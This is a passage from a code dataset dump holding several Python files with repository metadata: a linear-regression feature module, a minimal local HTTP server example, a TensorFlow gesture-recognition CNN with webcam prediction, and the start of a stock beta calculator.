28, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 36, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 37, "usage_type": "call"}, {"api_name": "Commodity.Commodity", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_pdf.PdfPages", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", 
"line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}]}
+{"seq_id": "22730035953", "text": "\"\"\"Calculates quantity values after linearization.\n\"\"\"\nfrom dm.attrs.AbstractPrepareAttr import AbstractPrepareAttr\nfrom scipy import stats\n\n__author__ = 'Klára Nečasová'\n__email__ = 'xnecas24@stud.fit.vutbr.cz'\n\n\nclass InLinear(AbstractPrepareAttr):\n def execute(self, timestamp_before, timestamp_after, column, precision,\n start_before, end_before, start_after, end_after, prefix):\n def compute(start, end, timestamp, interval_name):\n res = self.interval_selector.interval(column, start, end)\n x = []\n y = []\n for i in range(0, len(res)):\n x.append(i + start)\n y.append(res[i])\n\n slope, intercept, _, _, _ = stats.linregress(x, y)\n res = round(intercept + slope * timestamp, precision)\n\n if interval_name == 'before':\n interval = end_before - start_before\n else:\n interval = end_after - start_after\n name = self.attr_name(column, prefix, interval_name, str(interval))\n\n return name, res\n\n before = [compute(start_before, end_before, timestamp_before, 'before')]\n after = [compute(start_after, end_after, timestamp_after, 'after')]\n\n return before, after\n", "repo_name": "Klarksonnek/DP", "sub_path": "dm/attrs/InLinear.py", "file_name": "InLinear.py", "file_ext": "py", "file_size_in_byte": 1275, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dm.attrs.AbstractPrepareAttr.AbstractPrepareAttr", "line_number": 10, "usage_type": "name"}, {"api_name": "scipy.stats.linregress", "line_number": 21, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 21, "usage_type": "name"}]}
+{"seq_id": "13422132876", "text": "#coding:utf-8\r\nimport http.server\r\nimport socketserver\r\n\r\nport = 80\r\nadress =(\"\",port)\r\nhandler= http.server.SimpleHTTPRequestHandler\r\nhttpd = socketserver.TCPServer(adress,handler)\r\nprint(f\"Le server a démarré sur le port {port}\")\r\nhttpd.serve_forever()", "repo_name": "CherifaHamroun/python-project", "sub_path": "Cours/Server TCP/ServeurHTTPetPageWeb.py", "file_name": "ServeurHTTPetPageWeb.py", "file_ext": "py", "file_size_in_byte": 256, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "http.server.server", "line_number": 7, "usage_type": "attribute"}, {"api_name": "http.server", "line_number": 7, "usage_type": "name"}, {"api_name": "socketserver.TCPServer", "line_number": 8, "usage_type": "call"}]}
+{"seq_id": "1265073349", "text": "import tensorflow as tf, numpy as np, imageio, matplotlib.pyplot as plt, cv2, traceback, os\n\n\"\"\"\nConvolutional Layer with Max Pooling and Local Response Normalization\n\"\"\"\ndef conv_layer(in_layer,out_chan,size,sigma=0.01,b=0.0,strd=[1,1,1,1],pool=True):\n in_chan = in_layer.shape.as_list()[3]\n w = tf.Variable(tf.truncated_normal([size,size,in_chan,out_chan],stddev=sigma))\n b = tf.Variable(tf.constant(b, shape=[out_chan]))\n h_ = tf.nn.conv2d(in_layer, w, strides=strd,padding='VALID')+b\n p = tf.nn.max_pool(h_,ksize = [1,4,4,1], strides = [1,2,2,1], padding='VALID')\n h = tf.nn.relu(p)\n n = tf.nn.local_response_normalization(h, depth_radius=min(4,out_chan-2))\n if pool:\n return w,b,h,n\n h = tf.nn.relu(h_)\n n1 = tf.nn.local_response_normalization(h,depth_radius=min(4,out_chan-2))\n return w,b,h,n1\n\n\n\"\"\"\nFully Connected Layer\n\"\"\"\ndef conn_layer(in_layer,out_nodes,op_layer=False,sigma=0.01,b=0.0):\n i_s = in_layer.shape.as_list()\n #print(i_s)\n in_layer2 = in_layer\n if len(i_s) > 2:\n in_layer2 = tf.reshape(in_layer,[-1,i_s[1]*i_s[2]*i_s[3]])\n w = tf.Variable(tf.truncated_normal([i_s[1]*i_s[2]*i_s[3],out_nodes],stddev=sigma))\n else:\n w = tf.Variable(tf.truncated_normal([i_s[-1],out_nodes],stddev=sigma))\n b = tf.Variable(tf.constant(b, shape=[out_nodes]))\n h = tf.matmul(in_layer2,w)+b\n if not op_layer:\n h = tf.nn.relu(h)\n r = tf.nn.l2_loss(w)\n return w,b,h,r\n\n\n\"\"\"\nThe architecture: 3 conv layers and 2 fc layers with dropout\n\"\"\"\noutput_classes = 6\nx = tf.placeholder(tf.float32, shape=[None,128*128*1])\ny = tf.placeholder(tf.float32, shape=[None,output_classes])\nlearning_rate = tf.placeholder(tf.float32)\nkeep_prob = tf.placeholder(tf.float32)\nx_img = tf.reshape(x,[-1,128,128,1])\nw1,b1,h1,n1 = conv_layer(x_img,64,16)\nw2,b2,h2,n2 = conv_layer(n1,32,8)\nw3,b3,h3,n3 = conv_layer(n2,16,16)\nw4,b4,h4,r4 = conn_layer(n3,1024)\nh4_drop = tf.nn.dropout(h4,keep_prob)\nw5,b5,h5,r5 = conn_layer(h4_drop,512)\nh5_drop = tf.nn.dropout(h5,keep_prob)\nw6,b6,y_,r6 = conn_layer(h5_drop,output_classes,op_layer=True)\n\n\n\"\"\"\nLoss function: Softmax Cross Entropy\n\"\"\"\nloss0 = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=y_))\nreg = r4+r5+r6\nloss = loss0 + 0.01*reg\n\n\"\"\"\nAdaptive moments for training\n\"\"\"\ntrain_step = tf.train.AdamOptimizer(learning_rate).minimize(loss)\n\n\n\"\"\"\nCompare predicted classes vs actual classes\n\"\"\"\ncorrect_prediction = tf.cast(tf.equal(tf.argmax(y,1),tf.argmax(y_,1)),tf.float32)\n\n\"\"\"\nSaver object to save and restore variables\n\"\"\"\nsaver = tf.train.Saver({'w1':w1,'b1':b1,'w2':w2,'b2':b2,'w3':w3,'b3':b3,'w4':w4,'b4':b4,'w5':w5,'b5':b5,'w6':w6,'b6':b6})\n\n\"\"\"\nVisualize output of a convolutional layer\n\"\"\"\ndef visualize_layer(layer,sess):\n img = cv2.imread('./New Data/Test/1/umaschd1.pgm',0)\n ch = 1\n if len(img.shape) > 2:\n ch = min(3,img.shape[2])\n img = img[:,:,:ch]\n ip = cv2.resize(img,(128,128),interpolation=cv2.INTER_AREA).reshape(128*128*ch)\n unit = sess.run(layer,feed_dict = {x:[ip]})\n## m = unit[0][0][0][0]\n## for i in range(unit.shape[0]):\n## for j in range(unit.shape[1]):\n## for k in range(unit.shape[2]):\n## for l in range(unit.shape[3]):\n## m = max(m,unit[i][j][k][l])\n## unit = unit*255/m\n cv2.imshow('frame',unit[0,:,:,:3])\n cv2.waitKey(1)\n\n\n\"\"\"\ncheck validation accuracy\n\"\"\"\ndef validate(net_loader,sess,test=False):\n acc = 0\n ls2 = 0\n acc_t = 0\n ls_t = 0\n test_data = net_loader.test_data\n 
step = 1\n out_str = 'validation loss:'\n if test == False:\n step = 4\n out_str = 'test loss:'\n try:\n for i in range(0,len(test_data),step):\n #print(file, lab)\n ip = net_loader.get_single_img(test_data[i][0])\n lab = test_data[i][1]\n #print('predicted: ',np.argmax(sess.run(y_,feed_dict={x:[ip],keep_prob:1.0})))\n #print('actual: ',np.argmax(lab), ' ',lab)\n acc += correct_prediction.eval(feed_dict={x:[ip],y:[lab],keep_prob:1.0})\n ls2 += loss.eval(feed_dict={x:[ip], y:[lab], keep_prob:1.0})\n acc /= len(test_data)/step\n ls2 /= len(test_data)/step\n print(out_str,ls2, '; test acc: ',acc)\n return acc,ls2\n except:\n traceback.print_exc()\n\n\"\"\" \nTrain the model. Inputs: number of epochs, learning rate, train and test data, and whether to continue training model or start afresh\n\"\"\"\ndef train(epochs,batch_sz,epsilon,net_loader,reload):\n print('epochs:',epochs,' learning rate:',epsilon,' batch size:', batch_sz,' reload:',reload)\n ls = []\n ls2 = []\n acc = []\n with tf.Session(config=tf.ConfigProto(log_device_placement=True)) as sess:\n sess.run(tf.global_variables_initializer())\n ckpt = 'model1_temp.ckpt'\n acc_file = []\n prev_acc = -1\n prev_ls = 999999999\n if reload == True:\n try:\n saver.restore(sess, net_loader.model_dir+ckpt)\n print(\"Model reloaded successfully.\")\n try:\n acc_file = open(net_loader.model_dir+'prev_acc.txt','r')\n prev_acc = np.float32(acc_file.readline().strip())\n prev_ls = np.float32(acc_file.readline().strip())\n acc_file.close()\n print('previous test loss: ',prev_ls)\n print('previous test accuracy: ',prev_acc)\n except OSError:\n pass\n except tf.errors.NotFoundError:\n print(\"Model \"+ckpt+\" not found, will create new file\")\n else:\n print(\"'Reload' set to 'False', starting afresh\")\n\n for e in range(epochs):\n print(e+1)\n l = 0\n a = 0\n for b in range(0,net_loader.train_size,batch_sz):\n ip = net_loader.get_batch_random(batch_sz)\n train_step.run(feed_dict={x:ip[0],y:ip[1],learning_rate:epsilon,keep_prob:0.5})\n l += loss.eval(feed_dict={x:ip[0],y:ip[1],keep_prob:1.0})\n a += np.mean(correct_prediction.eval(feed_dict={x:ip[0],y:ip[1],keep_prob:1.0}))\n l /= net_loader.train_size/batch_sz\n a /= net_loader.train_size/batch_sz\n print(\"Train loss: \",l)\n print(\"Train acc: \",a)\n ls.append(l)\n if ((e+1)%(epochs/10) == 0) or epochs <= 50:\n a,l = validate(net_loader,sess,True)\n if len(acc)<=1:\n if a>=prev_acc:\n save_path = saver.save(sess, net_loader.model_dir+ckpt)\n print('Model saved at ', save_path) \n elif a>=np.amax(acc) and a>=prev_acc:\n save_path = saver.save(sess, net_loader.model_dir+ckpt)\n print('Model saved at ', save_path)\n acc_file = open(net_loader.model_dir+'prev_acc.txt','w')\n acc_file.write(str(a[0])+'\\n')\n acc_file.write(str(l)+'\\n')\n acc_file.close()\n acc.append(a)\n ls2.append(l)\n a,l = validate(net_loader,sess,True)\n print(\"Final test loss:\",l,\" ; Final test accuracy:\",a)\n## save_path = saver.save(sess, net_loader.model_dir+ckpt)\n## print('Model saved at ', save_path)\n x1 = [i for i in range(len(ls))]\n x2 = [i for i in range(len(acc))]\n x3 = [i for i in range(len(ls2))]\n plt.figure('train loss')\n plt.plot(x1,ls)\n plt.figure('test acc')\n plt.plot(x2,acc)\n plt.figure('test loss')\n plt.plot(x3,ls2)\n plt.show()\n\n\"\"\"\nTest the model without training.\n\"\"\"\ndef test(net_loader):\n with tf.Session() as sess:\n ckpt = 'model6.ckpt'\n saver.restore(sess, net_loader.model_dir+ckpt)\n acc = 0\n for file, lab in net_loader.test_data:\n img = net_loader.get_single_img(file)\n 
#cv2.imshow('frame',sess.run(p1,feed_dict={x:[img]})[0,:,:,:3])\n #cv2.waitKey(1)\n acc += correct_prediction.eval(feed_dict={x:[img], y:[lab],keep_prob:1.0})\n acc/=net_loader.test_size\n print(acc)\n\n\"\"\"\nWith video check\n\"\"\"\ndef foo(net_loader):\n with tf.Session() as sess:\n ckpt = 'model1.ckpt'\n saver.restore(sess, net_loader.model_dir+ckpt)\n cap = cv2.VideoCapture(0)\n \n while(True):\n # Capture frame-by-frame\n ret, frame = cap.read()\n\n # Our operations on the frame come here\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n ggray=gray\n cv2.rectangle(ggray,(0,0),(128*2,128*2),(0,255,0),3)\n # Display the resulting frame\n cv2.imshow('gray',ggray)\n cv2.waitKey(1)\n## if cv2.waitKey(1) & 0xFF == ord('q'):\n## break\n## elif cv2.waitKey(1) & 0xFF == ord(' '):\n gray=gray[0:128*2,0:128*2]\n height, width = gray.shape[:2]\n gray = cv2.resize(gray,(int(0.5*width), int(0.5*height)), interpolation = cv2.INTER_CUBIC)\n gray=np.reshape(gray,[1,128*128])\n print(net_loader.nums_class[sess.run(tf.argmax(y_,1),feed_dict={x:gray,keep_prob:1.0})[0]])\n \n # When everything done, release the capture\n cap.release()\n cv2.destroyAllWindows()\ndef foo1(net_loader):\n with tf.Session() as sess:\n ckpt = 'model1.ckpt'\n saver.restore(sess, net_loader.model_dir+ckpt)\n cap = cv2.VideoCapture(0)\n fgbg = cv2.createBackgroundSubtractorMOG2()\n while(1):\n ret, frame = cap.read()\n if ret == True:\n fgmask = fgbg.apply(frame)\n \n cv2.imshow('frame',frame[100:450,80:330,:])\n cv2.imshow('fgmask',fgmask[100:450,80:330])\n\n\n fgmask = fgmask[100:450,80:330]\n fgmask = cv2.resize(fgmask ,(128,128), interpolation = cv2.INTER_CUBIC)\n fgmask = np.reshape(fgmask , [1,128*128*1])\n print('Predicted :',net_loader.nums_class[sess.run(tf.argmax(y_,1),feed_dict={x:fgmask,keep_prob:1.0})[0]])\t\n\n k = cv2.waitKey(30) & 0xff\n if k == 27:\n break\n else:\n break\n cap.release()\n cv2.destroyAllWindows()\n#merging with teja\n\ndef test_wtih_cam(net_loader):\n with tf.Session() as sess:\n ckpt = 'model1_temp.ckpt'\n saver.restore(sess, net_loader.model_dir+ckpt)\n cap = cv2.VideoCapture(0)\n #---------------------------------------------------------------------------------------#\n #Capture Background\n print('Enter \\'c\\' to capture empty background')\n while True:\n ret, frame = cap.read()\n roi = frame[:256,:256,:]\n\n hsv = cv2.cvtColor(roi,cv2.COLOR_BGR2HSV)\n target = frame\n hsvt = cv2.cvtColor(target,cv2.COLOR_BGR2HSV)\n\n cv2.rectangle(frame,(0,0),(256,256),(0,255,0),3)\n cv2.imshow('frame',frame[:256,:256,:])\n\n if ret == True:\n k = cv2.waitKey(30) & 0xff\n if k == 27:\n break\n elif k == ord('c'):\n # calculating object histogram\n roihist = cv2.calcHist([hsv],[0, 1], None, [180, 256], [0, 180, 0, 256] )\n # normalize histogram and apply backprojection\n cv2.normalize(roihist,roihist,0,255,cv2.NORM_MINMAX)\n break\n else:\n break\n cv2.destroyAllWindows()\n #---------------------------------------------------------------------------------------#\n cv2.imshow('Actual',frame[:1,:1])\n cv2.imshow('Output',frame[:1,:1])\n cv2.moveWindow('Actual', 100,100)\n cv2.moveWindow('Output', 600,100)\n #---------------------------------------------------------------------------------------#\n #Actual capture of images\n print('Started the cam to predict')\n while True:\n ret, frame = cap.read()\n if ret == True:\n target = frame\n hsvt = cv2.cvtColor(target,cv2.COLOR_BGR2HSV)\n dst = cv2.calcBackProject([hsvt],[0,1],roihist,[0,180,0,256],1)\n\n disc = 
cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(10,10))\n cv2.filter2D(dst,-1,disc,dst)\n\n blur = cv2.GaussianBlur(dst, (11,11), 0)\n blur = cv2.medianBlur(blur, 15)\n \n ret,thresh = cv2.threshold(blur,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n thresh = cv2.merge((thresh,thresh,thresh))\n thresh = cv2.bitwise_not(thresh)\n op = frame[:256,:256,:]\n \n cv2.imshow('Actual',op)\n \n t_=thresh = thresh[:256,:256,:]\n thresh = cv2.resize(thresh ,(128,128), interpolation = cv2.INTER_CUBIC)\n thresh = cv2.cvtColor(thresh,cv2.COLOR_BGR2GRAY)\n thresh = np.reshape(thresh , [1,128,128, 1])\n thresh_ = np.reshape(thresh , [1,128*128*1])\n ans = net_loader.nums_class[sess.run(tf.argmax(y_,1),feed_dict={x:thresh_,keep_prob:1.0})[0]]\n\n print('Predicted :',ans) \n \n op_ = np.zeros((100,256,3))\n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(op_,ans.split('/')[-1],(0,90), font, 2,(255,0,0),2,cv2.LINE_AA)\n op = np.vstack((t_,op_))\n cv2.imshow('Output', op)\n \n k = cv2.waitKey(30) & 0xff\n if k == 27:\n break\n else:\n break \n\n cap.release()\n cv2.destroyAllWindows()\n", "repo_name": "satyatejachikatla/Gesture-Classifier", "sub_path": "tf imp/cnn.py", "file_name": "cnn.py", "file_ext": "py", "file_size_in_byte": 14271, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tensorflow.Variable", "line_number": 8, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 8, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 9, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 9, "usage_type": "call"}, {"api_name": "tensorflow.nn.conv2d", "line_number": 10, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 10, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.max_pool", "line_number": 11, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 11, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 12, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 12, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.local_response_normalization", "line_number": 13, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 13, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 16, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 16, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.local_response_normalization", "line_number": 17, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 17, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 33, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 33, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 34, "usage_type": "call"}, {"api_name": "tensorflow.nn.relu", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 36, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.l2_loss", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.nn", 
"line_number": 37, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 45, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 45, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 46, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 46, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 47, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 47, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 48, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 49, "usage_type": "call"}, {"api_name": "tensorflow.nn.dropout", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.dropout", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 56, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax_cross_entropy_with_logits", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 63, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 70, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 70, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow.equal", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 76, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Saver", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 81, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 87, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 92, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 92, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 101, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 102, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 133, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 143, "usage_type": "call"}, {"api_name": "tensorflow.ConfigProto", "line_number": 143, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 156, "usage_type": "call"}, {"api_name": "tensorflow.errors", "line_number": 162, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.plot", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 206, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 208, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 208, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 209, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 209, "usage_type": "name"}, {"api_name": "tensorflow.Session", "line_number": 215, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 231, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 234, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 241, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 241, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 243, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 245, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 246, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 252, "usage_type": "call"}, {"api_name": "cv2.INTER_CUBIC", "line_number": 252, "usage_type": "attribute"}, {"api_name": "numpy.reshape", "line_number": 253, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 254, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 258, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 260, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 263, "usage_type": "call"}, {"api_name": "cv2.createBackgroundSubtractorMOG2", "line_number": 264, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 270, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 271, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 275, "usage_type": "call"}, {"api_name": "cv2.INTER_CUBIC", "line_number": 275, "usage_type": "attribute"}, {"api_name": "numpy.reshape", "line_number": 276, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 277, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 279, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 285, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 289, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 292, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 300, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 300, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 302, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 302, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 304, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 305, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 308, "usage_type": "call"}, {"api_name": "cv2.calcHist", "line_number": 313, "usage_type": "call"}, {"api_name": "cv2.normalize", "line_number": 315, "usage_type": "call"}, {"api_name": "cv2.NORM_MINMAX", "line_number": 315, "usage_type": "attribute"}, {"api_name": "cv2.destroyAllWindows", "line_number": 319, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 321, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 322, 
"usage_type": "call"}, {"api_name": "cv2.moveWindow", "line_number": 323, "usage_type": "call"}, {"api_name": "cv2.moveWindow", "line_number": 324, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 332, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 332, "usage_type": "attribute"}, {"api_name": "cv2.calcBackProject", "line_number": 333, "usage_type": "call"}, {"api_name": "cv2.getStructuringElement", "line_number": 335, "usage_type": "call"}, {"api_name": "cv2.MORPH_ELLIPSE", "line_number": 335, "usage_type": "attribute"}, {"api_name": "cv2.filter2D", "line_number": 336, "usage_type": "call"}, {"api_name": "cv2.GaussianBlur", "line_number": 338, "usage_type": "call"}, {"api_name": "cv2.medianBlur", "line_number": 339, "usage_type": "call"}, {"api_name": "cv2.threshold", "line_number": 341, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 341, "usage_type": "attribute"}, {"api_name": "cv2.THRESH_OTSU", "line_number": 341, "usage_type": "attribute"}, {"api_name": "cv2.merge", "line_number": 342, "usage_type": "call"}, {"api_name": "cv2.bitwise_not", "line_number": 343, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 346, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 349, "usage_type": "call"}, {"api_name": "cv2.INTER_CUBIC", "line_number": 349, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 350, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 350, "usage_type": "attribute"}, {"api_name": "numpy.reshape", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 352, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 353, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 357, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 358, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 359, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 359, "usage_type": "attribute"}, {"api_name": "numpy.vstack", "line_number": 360, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 361, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 363, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 370, "usage_type": "call"}]}
+{"seq_id": "4238892563", "text": "import csv\r\nimport jalali\r\nimport datetime\r\nimport numpy as np\r\nimport pandas as pd\r\nimport dateutil.relativedelta\r\n\r\n\r\ndef calcCov(end, start, df): # Calculates covariance.\r\n df = df[(df[\"date\"] >= start) & (df[\"date\"] <= end)][[\"return\", \"return_index\"]]\r\n return np.cov(df[\"return\"], df[\"return_index\"])[0][1]\r\n\r\ndef calcBeta(end, start, df, cov): # Calculates beta.\r\n df = df[(df[\"date\"] >= start) & (df[\"date\"] <= end)][\"return_index\"]\r\n var = np.var(df)\r\n return cov / var\r\n\r\ndef calcSD(end, start, df): # Calculates standard deviation.\r\n df = df[(df[\"date\"] >= start) & (df[\"date\"] <= end)][\"return\"]\r\n return np.std(df)\r\n\r\ndef calcTotalReturn(end, start, df): # Calculates total return value.\r\n df = df[(df[\"date\"] >= start) & (df[\"date\"] <= end)][\"return\"]\r\n return np.sum(df)\r\n\r\ndef calcCV(end, start, df, sd, tr): # Calculates CV.\r\n df = df[(df[\"date\"] >= start) & (df[\"date\"] <= end)]\r\n row_count, _ = df.shape\r\n return sd / (tr / row_count)\r\n\r\ndef datetimeToString(date): # Convertes a date object to integer like datetime.date(2020, 1, 12) ---> 20200112.\r\n date = str(date)\r\n return int(date[0:4] + date[5:7] + date[8:])\r\n\r\ndef controlAll(start=None, end=None): # Runs all functions above for calculating table numbers.\r\n with open(\"Beta/inData/stocks_urls.csv\", \"r\", newline=\"\", encoding=\"utf-8\") as file:\r\n reader = csv.reader(file)\r\n\r\n # All are datetime.date() type.\r\n today = datetime.date.today()\r\n last_1_month = datetimeToString(today + dateutil.relativedelta.relativedelta(months=-1))\r\n last_3_month = datetimeToString(today + dateutil.relativedelta.relativedelta(months=-3))\r\n last_6_month = datetimeToString(today + dateutil.relativedelta.relativedelta(months=-6))\r\n last_9_month = datetimeToString(today + dateutil.relativedelta.relativedelta(months=-9))\r\n last_1_year = datetimeToString(today + dateutil.relativedelta.relativedelta(years=-1))\r\n last_2_year = datetimeToString(today + dateutil.relativedelta.relativedelta(years=-2))\r\n last_3_year = datetimeToString(today + dateutil.relativedelta.relativedelta(years=-3))\r\n today = datetimeToString(today)\r\n\r\n df_out_m1 = pd.DataFrame(columns=['ticker', 'cov', 'beta', 'sd', 'tr', 'cv'])\r\n df_out_m3 